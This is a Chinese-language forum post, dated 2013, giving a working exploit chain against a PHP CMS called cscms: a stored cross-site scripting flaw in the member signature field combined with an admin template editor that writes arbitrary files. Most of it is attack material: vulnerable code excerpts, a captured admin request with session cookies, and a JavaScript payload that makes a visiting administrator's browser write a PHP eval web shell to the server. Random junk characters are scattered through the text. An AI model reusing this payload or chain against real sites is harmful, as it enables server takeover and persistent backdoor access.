|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
: ^- z5 I% H" k: g0 M/ z4 u7 o0 G官网已经修补了,所以重新下了源码
* x% n# X' k$ Z" T% H/ t# p因为 后台登入 还需要认证码 所以 注入就没看了。
; P! s$ [1 f H1 F& z6 _) W存在 xss% C8 N* u8 ?# v, F7 v. T' p
漏洞文件 user/member/skin_edit.php
5 o. A1 r# @. L# j# \3 J3 j本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
8 w, t$ `% B- S6 {- A: g * h3 n% w0 @9 ], a# [# b
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>1 a7 i. }: T/ Y1 z
& t" ]: @; K8 n</textarea></td></tr>
2 s. }5 w- g7 S2 g- N4 B4 r " D2 I1 |$ d" o
user/do.php
% P- G# ?8 p. L, a7 q; u" d
% U5 @$ o# T4 {2 i$ u8 Z( X: A2 ?# p6 e. t- S8 w1 Z
if($op=='zl'){ //资料
' j' D4 r6 n/ B. F ! t+ k) g- _/ X( g
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
( ^9 A. ]8 P( q% o- g exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));) s) ], u! D5 ~& l, W' ?( j- G
`( H1 H- z; K# Y $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
4 U$ ^8 H0 J6 W0 |3 K8 }
* S# E! ~' }" J0 x) p1 @+ T CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'; m5 i/ f6 U7 U! D
where CS_Name='".$cscms_name."'";6 U, }% a2 p. [3 }3 Z' V0 T
$ s* O w' z2 ]% r& K! [3 M
if($db->query($sql)){" w/ c0 b) o5 ^
% ~* s& L1 {. E* V7 o% { exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
4 c: h- D) l/ Y3 s+ a% w6 Q ! P- s8 h' {* }$ R3 X" c3 _' ` r
}else{
6 ?% K [, k! M) m& G' q+ ^
. _1 Z: Y6 _2 _ exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));' b/ r2 a# ~8 O2 h) O, @4 n) Q
' F6 |: x/ `% B5 m& P% s/ c) o: W4 ? }
+ H$ s% i n7 X3 K/ s" \: M8 y$ T8 ?& U! w
& R/ `: O+ r3 l9 c3 `: [3 z
没有 过滤导致xss产生。
" ~6 d6 B1 A& _. B- O后台 看了下 很奇葩的是可以写任意格式文件。。
" Z$ ]6 ^1 f$ S& X* {抓包。。
' h0 S4 E! \. C9 q' h; j( D7 N8 v% o* V+ i8 u% x3 t7 x
" w/ ^/ I$ d: z4 C# ~/ k; A
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1% N n, p' Q7 c8 Y6 d* |
3 _0 H% b* L; w- Q
Accept: text/html, application/xhtml+xml, */*
% k% t8 P9 p- f6 j 7 N% @# @* j2 i' u
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
# z' T8 l. e. Z( {; T+ P
6 E8 o: _, n. z' V U' h! LAccept-Language: zh-CN
3 d9 X) a. v0 D: p3 o & `2 O* y, @" I
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)* E! _$ D7 _3 o0 O. o
( d7 Z9 ]1 t) O/ [. zContent-Type: application/x-www-form-urlencoded( Y. k( @3 W: g% {& j e* R
% r" q! h% N& `( R3 |+ V9 X3 f% gAccept-Encoding: gzip, deflate
+ h3 I1 C4 i8 b; |3 k 0 t5 T: R P3 U0 Y0 Q
Host: 127.0.0.1
! h# T8 U. z* a$ S
# C: _$ q0 x N/ {& pContent-Length: 38+ A( j- c. A) w% S+ r" V
# c% u9 m- I! o6 ]
DNT: 1: b& ]+ H9 q: P& y. S: {3 `; ], ]
0 h: q* E: U" ?+ e7 m
Connection: Keep-Alive2 ~7 f# B0 o% [' m1 c# c8 ^) E7 Z. Z
8 A% H: j2 H( Z; C6 r
Cache-Control: no-cache( h" {: q. W+ `, {& y
0 {2 m1 O( o) Y3 q% f- a7 t RCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594" v. j9 R$ u1 Z
- y6 V+ b1 k+ ]0 E% l, U* |& T* I' `# Z, I: e, Z$ `: ]0 t* x/ q" \8 O
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
+ [ D( o3 X9 F5 D
) O" Y- P& `/ s0 u9 D/ u+ i# } s% a! F9 f5 d) z2 U
. K6 `6 z$ n1 r9 p于是 构造js如下。
* o- Y8 h# [" F; e! ?4 @1 K8 P4 C, \2 E y+ v( D: [$ I
本帖隐藏的内容<script> ' ?& l! f& v7 A
thisTHost = top.location.hostname;
6 d" t" x0 b) r5 w+ R( m X % B7 f) F7 V- R' |
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
3 g9 y4 q3 y: w5 |+ |$ d 8 l: z( D, G9 d" W" L0 `% u
function PostSubmit(url, data, msg) { 6 G/ s- x1 l; H1 ~/ J( L6 F
var postUrl = url;. r5 o) E i" C& h4 F* F1 E
+ _3 c. Q6 I0 x$ k6 a3 J: V var postData = data; + r& @$ Y% _& r: P3 r
var msgData = msg; # m, V, b9 ?# p9 [- ]9 ?1 m. A
var ExportForm = document.createElement("FORM");
+ Q2 m( u9 A0 R# s document.body.appendChild(ExportForm);
9 U6 {/ @7 m7 g( ~/ b ExportForm.method = "POST"; : E- n; ]1 m) M+ z( a, o
var newElement = document.createElement("input");
! W8 h7 Q( u H) E newElement.setAttribute("name", "name");
7 t7 f g8 n" v& j. q$ X newElement.setAttribute("type", "hidden"); 0 p! i( \8 j* C5 \. ^9 u( A' m
var newElement2 = document.createElement("input"); & k: `; P- N% j a4 F
newElement2.setAttribute("name", "content"); 1 e+ s- [2 x& a' s8 ^2 ?
newElement2.setAttribute("type", "hidden"); # J6 B; ~ f d5 {$ ~) c1 a
ExportForm.appendChild(newElement); # r I* G9 i) f& O; |
ExportForm.appendChild(newElement2);
$ H: z6 c. G+ B+ Z, h' z& Q; R6 D5 |4 s newElement.value = postData;
0 d. x- s, m5 @6 @8 q: o newElement2.value = msgData;
$ v! S9 l9 c7 } ExportForm.action = postUrl;
' s% M p* s. D m ExportForm.submit(); 4 E) T7 l, y1 Y
};$ I6 [' l8 d3 k! m
1 i+ C$ ? R# k, V- E* y
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ \+ m/ R2 M1 d; y' P( z8 p* g
r x* H1 n, v, h" w/ B</script>* \* } r" ^7 v: W& R! z7 _2 t7 W
/ Y: |; J/ T: C
- q1 C3 ` G& _, W5 J4 S$ d! ]% d4 B7 O' S
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入7 [" u2 n {+ s6 z+ [6 n& X
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
/ a0 n: K6 x" x( Z& a0 G就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
& ~$ k0 F5 ?+ J1 y6 d$ w) Q/ o
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对